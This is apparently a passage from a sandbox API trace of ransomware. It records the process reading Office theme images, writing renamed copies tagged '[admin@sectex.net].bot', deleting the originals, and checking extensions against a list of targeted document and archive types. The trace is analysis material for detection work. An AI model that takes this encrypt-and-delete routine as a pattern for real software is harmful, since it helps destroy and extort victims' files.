	[0043.728] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\eclipse\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f4
	[0043.728] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0043.728] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0043.728] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\THMBNAIL.PNG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\eclipse\\thmbnail.png.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x204
	[0043.728] GetLastError () returned 0x0
	[0043.728] ReadFile (in: hFile=0x1f4, lpBuffer=0xad80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa19fed4, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesRead=0xa19fed4*=0x7e93, lpOverlapped=0x0) returned 1
	[0044.044] WriteFile (in: hFile=0x204, lpBuffer=0xad80020*, nNumberOfBytesToWrite=0x7ea0, lpNumberOfBytesWritten=0xa19fc9c, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesWritten=0xa19fc9c*=0x7ea0, lpOverlapped=0x0) returned 1
	[0044.045] ReadFile (in: hFile=0x1f4, lpBuffer=0xad80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa19fed4, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesRead=0xa19fed4*=0x0, lpOverlapped=0x0) returned 1
	[0044.045] WriteFile (in: hFile=0x204, lpBuffer=0xad80020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa19fc9c, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesWritten=0xa19fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0044.045] SetEndOfFile (hFile=0x204) returned 1
	[0044.045] CloseHandle (hObject=0x204) returned 1
	[0044.045] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0044.046] SetEndOfFile (hFile=0x1f4) returned 1
	[0044.046] CloseHandle (hObject=0x1f4) returned 1
	[0044.046] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\THMBNAIL.PNG.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0044.047] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\eclipse\\thmbnail.png")) returned 1
	[0044.047] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\THMBNAIL.PNG") returned 76
	[0044.047] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\THMBNAIL.PNG") returned 76
	[0044.047] lstrlenW (lpString=".doc") returned 4
	[0044.047] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1
	[0044.047] lstrlenW (lpString=".docx") returned 5
	[0044.047] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1
	[0044.047] lstrlenW (lpString=".pdf") returned 4
	[0044.047] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1
	[0044.047] lstrlenW (lpString=".xls") returned 4
	[0044.047] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1
	[0044.047] lstrlenW (lpString=".xlsx") returned 5
	[0044.047] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1
	[0044.047] lstrlenW (lpString=".ppt") returned 4
	[0044.047] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1
	[0044.047] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\THMBNAIL.PNG") returned 76
	[0044.047] lstrlenW (lpString=".zip") returned 4
	[0044.047] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1
	[0044.047] lstrlenW (lpString=".rar") returned 4
	[0044.047] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1
	[0044.047] lstrlenW (lpString=".bz2") returned 4
	[0044.047] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1
	[0044.047] lstrlenW (lpString=".7z") returned 3
	[0044.047] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1
	[0044.048] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\THMBNAIL.PNG") returned 76
	[0044.048] lstrlenW (lpString=".dbf") returned 4
	[0044.048] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1
	[0044.048] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\THMBNAIL.PNG") returned 76
	[0044.048] lstrlenW (lpString=".1cd") returned 4
	[0044.048] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1
	[0044.048] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\THMBNAIL.PNG") returned 76
	[0044.048] lstrlenW (lpString=".jpg") returned 4
	[0044.048] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1
	[0044.048] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\THMBNAIL.PNG") returned 76
	[0044.048] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\THMBNAIL.PNG") returned 76
	[0044.048] lstrlenW (lpString=".doc") returned 4
	[0044.048] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1
	[0044.048] lstrlenW (lpString=".docx") returned 5
	[0044.048] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1
	[0044.048] lstrlenW (lpString=".pdf") returned 4
	[0044.048] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1
	[0044.048] lstrlenW (lpString=".xls") returned 4
	[0044.048] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1
	[0044.048] lstrlenW (lpString=".xlsx") returned 5
	[0044.048] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1
	[0044.048] lstrlenW (lpString=".ppt") returned 4
	[0044.048] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1
	[0044.048] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\THMBNAIL.PNG") returned 76
	[0044.048] lstrlenW (lpString=".zip") returned 4
	[0044.048] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1
	[0044.048] lstrlenW (lpString=".rar") returned 4
	[0044.048] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1
	[0044.048] lstrlenW (lpString=".bz2") returned 4
	[0044.048] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1
	[0044.048] lstrlenW (lpString=".7z") returned 3
	[0044.048] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1
	[0044.048] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\THMBNAIL.PNG") returned 76
	[0044.048] lstrlenW (lpString=".dbf") returned 4
	[0044.049] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1
	[0044.049] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\THMBNAIL.PNG") returned 76
	[0044.049] lstrlenW (lpString=".1cd") returned 4
	[0044.049] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1
	[0044.049] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\THMBNAIL.PNG") returned 76
	[0044.049] lstrlenW (lpString=".jpg") returned 4
	[0044.049] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1
	[0044.049] lstrcmpiW (lpString1=".GIF", lpString2=".bot") returned 1
	[0044.049] lstrlenW (lpString="PREVIEW.GIF") returned 11
	[0044.049] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ice\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f4
	[0044.049] GetFileSizeEx (in: hFile=0x1f4, lpFileSize=0xa19ff1c | out: lpFileSize=0xa19ff1c*=2552) returned 1
	[0044.049] CloseHandle (hObject=0x1f4) returned 1
	[0044.049] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ice\\preview.gif")) returned 0x20
	[0044.049] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\PREVIEW.GIF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ice\\preview.gif.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0044.049] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ice\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f4
	[0044.050] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0044.050] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0044.050] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\PREVIEW.GIF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ice\\preview.gif.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x200
	[0044.331] GetLastError () returned 0x0
	[0044.332] ReadFile (in: hFile=0x1f4, lpBuffer=0xad80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa19fed4, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesRead=0xa19fed4*=0x9f8, lpOverlapped=0x0) returned 1
	[0044.352] WriteFile (in: hFile=0x200, lpBuffer=0xad80020*, nNumberOfBytesToWrite=0xa00, lpNumberOfBytesWritten=0xa19fc9c, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesWritten=0xa19fc9c*=0xa00, lpOverlapped=0x0) returned 1
	[0044.353] ReadFile (in: hFile=0x1f4, lpBuffer=0xad80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa19fed4, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesRead=0xa19fed4*=0x0, lpOverlapped=0x0) returned 1
	[0044.353] WriteFile (in: hFile=0x200, lpBuffer=0xad80020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0xa19fc9c, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesWritten=0xa19fc9c*=0xea, lpOverlapped=0x0) returned 1
	[0044.353] SetEndOfFile (hFile=0x200) returned 1
	[0044.353] CloseHandle (hObject=0x200) returned 1
	[0044.353] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0044.353] SetEndOfFile (hFile=0x1f4) returned 1
	[0044.354] CloseHandle (hObject=0x1f4) returned 1
	[0044.354] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\PREVIEW.GIF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0044.354] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ice\\preview.gif")) returned 1
	[0044.354] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\PREVIEW.GIF") returned 71
	[0044.354] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\PREVIEW.GIF") returned 71
	[0044.354] lstrlenW (lpString=".doc") returned 4
	[0044.354] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1
	[0044.355] lstrlenW (lpString=".docx") returned 5
	[0044.355] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1
	[0044.355] lstrlenW (lpString=".pdf") returned 4
	[0044.355] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1
	[0044.355] lstrlenW (lpString=".xls") returned 4
	[0044.355] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1
	[0044.355] lstrlenW (lpString=".xlsx") returned 5
	[0044.355] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1
	[0044.355] lstrlenW (lpString=".ppt") returned 4
	[0044.355] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1
	[0044.355] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\PREVIEW.GIF") returned 71
	[0044.355] lstrlenW (lpString=".zip") returned 4
	[0044.355] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1
	[0044.355] lstrlenW (lpString=".rar") returned 4
	[0044.355] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1
	[0044.355] lstrlenW (lpString=".bz2") returned 4
	[0044.355] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1
	[0044.355] lstrlenW (lpString=".7z") returned 3
	[0044.355] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1
	[0044.355] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\PREVIEW.GIF") returned 71
	[0044.355] lstrlenW (lpString=".dbf") returned 4
	[0044.355] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1
	[0044.355] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\PREVIEW.GIF") returned 71
	[0044.355] lstrlenW (lpString=".1cd") returned 4
	[0044.355] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1
	[0044.355] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\PREVIEW.GIF") returned 71
	[0044.355] lstrlenW (lpString=".jpg") returned 4
	[0044.355] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1
	[0044.355] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\PREVIEW.GIF") returned 71
	[0044.355] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\PREVIEW.GIF") returned 71
	[0044.355] lstrlenW (lpString=".doc") returned 4
	[0044.355] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1
	[0044.355] lstrlenW (lpString=".docx") returned 5
	[0044.355] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1
	[0044.356] lstrlenW (lpString=".pdf") returned 4
	[0044.356] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1
	[0044.356] lstrlenW (lpString=".xls") returned 4
	[0044.356] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1
	[0044.356] lstrlenW (lpString=".xlsx") returned 5
	[0044.356] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1
	[0044.356] lstrlenW (lpString=".ppt") returned 4
	[0044.356] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1
	[0044.356] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\PREVIEW.GIF") returned 71
	[0044.356] lstrlenW (lpString=".zip") returned 4
	[0044.356] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1
	[0044.356] lstrlenW (lpString=".rar") returned 4
	[0044.356] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1
	[0044.356] lstrlenW (lpString=".bz2") returned 4
	[0044.356] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1
	[0044.356] lstrlenW (lpString=".7z") returned 3
	[0044.356] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1
	[0044.356] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\PREVIEW.GIF") returned 71
	[0044.356] lstrlenW (lpString=".dbf") returned 4
	[0044.356] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1
	[0044.356] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\PREVIEW.GIF") returned 71
	[0044.356] lstrlenW (lpString=".1cd") returned 4
	[0044.356] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1
	[0044.356] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\PREVIEW.GIF") returned 71
	[0044.356] lstrlenW (lpString=".jpg") returned 4
	[0044.356] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1
	[0044.356] lstrcmpiW (lpString1=".PNG", lpString2=".bot") returned 1
	[0044.356] lstrlenW (lpString="THMBNAIL.PNG") returned 12
	[0044.356] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\iris\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f0
	[0044.708] GetFileSizeEx (in: hFile=0x1f0, lpFileSize=0xa19ff1c | out: lpFileSize=0xa19ff1c*=19485) returned 1
	[0044.708] CloseHandle (hObject=0x1f0) returned 1
	[0044.708] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\iris\\thmbnail.png")) returned 0x20
	[0044.708] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\THMBNAIL.PNG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\iris\\thmbnail.png.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0044.708] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\iris\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f0
	[0044.708] SetFilePointerEx (in: hFile=0x1f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0044.708] SetFilePointerEx (in: hFile=0x1f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0044.708] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\THMBNAIL.PNG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\iris\\thmbnail.png.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0
	[0044.708] GetLastError () returned 0x0
	[0044.708] ReadFile (in: hFile=0x1f0, lpBuffer=0xad80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa19fed4, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesRead=0xa19fed4*=0x4c1d, lpOverlapped=0x0) returned 1
	[0044.917] WriteFile (in: hFile=0x1a0, lpBuffer=0xad80020*, nNumberOfBytesToWrite=0x4c20, lpNumberOfBytesWritten=0xa19fc9c, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesWritten=0xa19fc9c*=0x4c20, lpOverlapped=0x0) returned 1
	[0044.918] ReadFile (in: hFile=0x1f0, lpBuffer=0xad80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa19fed4, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesRead=0xa19fed4*=0x0, lpOverlapped=0x0) returned 1
	[0044.918] WriteFile (in: hFile=0x1a0, lpBuffer=0xad80020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa19fc9c, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesWritten=0xa19fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0044.918] SetEndOfFile (hFile=0x1a0) returned 1
	[0044.919] CloseHandle (hObject=0x1a0) returned 1
	[0044.919] SetFilePointerEx (in: hFile=0x1f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0044.919] SetEndOfFile (hFile=0x1f0) returned 1
	[0044.920] CloseHandle (hObject=0x1f0) returned 1
	[0044.920] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\THMBNAIL.PNG.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0044.920] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\iris\\thmbnail.png")) returned 1
	[0044.920] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\THMBNAIL.PNG") returned 73
	[0044.920] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\THMBNAIL.PNG") returned 73
	[0044.920] lstrlenW (lpString=".doc") returned 4
	[0044.920] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1
	[0044.920] lstrlenW (lpString=".docx") returned 5
	[0044.921] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1
	[0044.921] lstrlenW (lpString=".pdf") returned 4
	[0044.921] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1
	[0044.921] lstrlenW (lpString=".xls") returned 4
	[0044.921] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1
	[0044.921] lstrlenW (lpString=".xlsx") returned 5
	[0044.921] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1
	[0044.921] lstrlenW (lpString=".ppt") returned 4
	[0044.921] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1
	[0044.921] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\THMBNAIL.PNG") returned 73
	[0044.921] lstrlenW (lpString=".zip") returned 4
	[0044.921] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1
	[0044.921] lstrlenW (lpString=".rar") returned 4
	[0044.921] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1
	[0044.921] lstrlenW (lpString=".bz2") returned 4
	[0044.921] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1
	[0044.921] lstrlenW (lpString=".7z") returned 3
	[0044.921] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1
	[0044.921] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\THMBNAIL.PNG") returned 73
	[0044.921] lstrlenW (lpString=".dbf") returned 4
	[0044.921] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1
	[0044.921] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\THMBNAIL.PNG") returned 73
	[0044.921] lstrlenW (lpString=".1cd") returned 4
	[0044.921] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1
	[0044.921] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\THMBNAIL.PNG") returned 73
	[0044.921] lstrlenW (lpString=".jpg") returned 4
	[0044.921] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1
	[0044.921] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\THMBNAIL.PNG") returned 73
	[0044.921] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\THMBNAIL.PNG") returned 73
	[0044.921] lstrlenW (lpString=".doc") returned 4
	[0044.921] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1
	[0044.921] lstrlenW (lpString=".docx") returned 5
	[0044.922] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1
	[0044.922] lstrlenW (lpString=".pdf") returned 4
	[0044.922] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1
	[0044.922] lstrlenW (lpString=".xls") returned 4
	[0044.922] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1
	[0044.922] lstrlenW (lpString=".xlsx") returned 5
	[0044.922] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1
	[0044.922] lstrlenW (lpString=".ppt") returned 4
	[0044.922] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1
	[0044.922] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\THMBNAIL.PNG") returned 73
	[0044.922] lstrlenW (lpString=".zip") returned 4
	[0044.922] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1
	[0044.922] lstrlenW (lpString=".rar") returned 4
	[0044.922] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1
	[0044.922] lstrlenW (lpString=".bz2") returned 4
	[0044.922] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1
	[0044.922] lstrlenW (lpString=".7z") returned 3
	[0044.922] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1
	[0044.922] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\THMBNAIL.PNG") returned 73
	[0044.922] lstrlenW (lpString=".dbf") returned 4
	[0044.922] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1
	[0044.922] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\THMBNAIL.PNG") returned 73
	[0044.922] lstrlenW (lpString=".1cd") returned 4
	[0044.922] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1
	[0044.922] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\THMBNAIL.PNG") returned 73
	[0044.922] lstrlenW (lpString=".jpg") returned 4
	[0044.922] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1
	[0044.922] lstrcmpiW (lpString1=".PNG", lpString2=".bot") returned 1
	[0044.922] lstrlenW (lpString="THMBNAIL.PNG") returned 12
	[0044.922] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\pixel\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x220
	[0045.218] GetFileSizeEx (in: hFile=0x220, lpFileSize=0xa19ff1c | out: lpFileSize=0xa19ff1c*=21745) returned 1
	[0045.218] CloseHandle (hObject=0x220) returned 1
